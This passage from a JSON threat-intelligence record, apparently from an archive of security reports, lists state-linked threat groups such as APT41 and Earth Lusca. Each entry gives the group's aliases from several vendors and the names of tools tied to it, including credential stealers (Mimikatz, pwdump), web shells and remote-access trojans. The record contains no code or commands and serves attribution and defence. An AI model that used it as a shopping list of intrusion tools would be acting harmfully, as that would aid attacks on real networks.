				"SAGEHIRE",
				"SPARKLOG",
				"SQLULDR2",
				"STASHLOG",
				"SWEETCANDLE",
				"ScrambleCross",
				"Sensocode",
				"SerialVlogger",
				"ShadowHammer",
				"ShadowPad Winnti",
				"SinoChopper",
				"Skip-2.0",
				"SneakCross",
				"Sogu",
				"Speculoos",
				"Spyder",
				"StealthReacher",
				"StealthVector",
				"TERA",
				"TIDYELF",
				"TIGERPLUG",
				"TOMMYGUN",
				"TVT",
				"Thoper",
				"Voldemort",
				"WIDETONE",
				"WINNKIT",
				"WINTERLOVE",
				"Winnti",
				"WyrmSpy",
				"X-Door",
				"XDOOR",
				"XMRig",
				"XShellGhost",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"gresim",
				"njRAT",
				"pwdump",
				"xDll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "24d5f393-f5c7-41a3-8d8f-2f9129a2925e",
			"created_at": "2024-11-20T02:00:03.66537Z",
			"updated_at": "2026-04-10T02:00:03.776928Z",
			"deleted_at": null,
			"main_name": "BrazenBamboo",
			"aliases": [],
			"source_name": "MISPGALAXY:BrazenBamboo",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434423,
	"ts_updated_at": 1775826768,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9b1d0db685cc28db58e242b341974a2c6f79cd0d.pdf",
		"text": "https://archive.orkl.eu/9b1d0db685cc28db58e242b341974a2c6f79cd0d.txt",
		"img": "https://archive.orkl.eu/9b1d0db685cc28db58e242b341974a2c6f79cd0d.jpg"
	}
}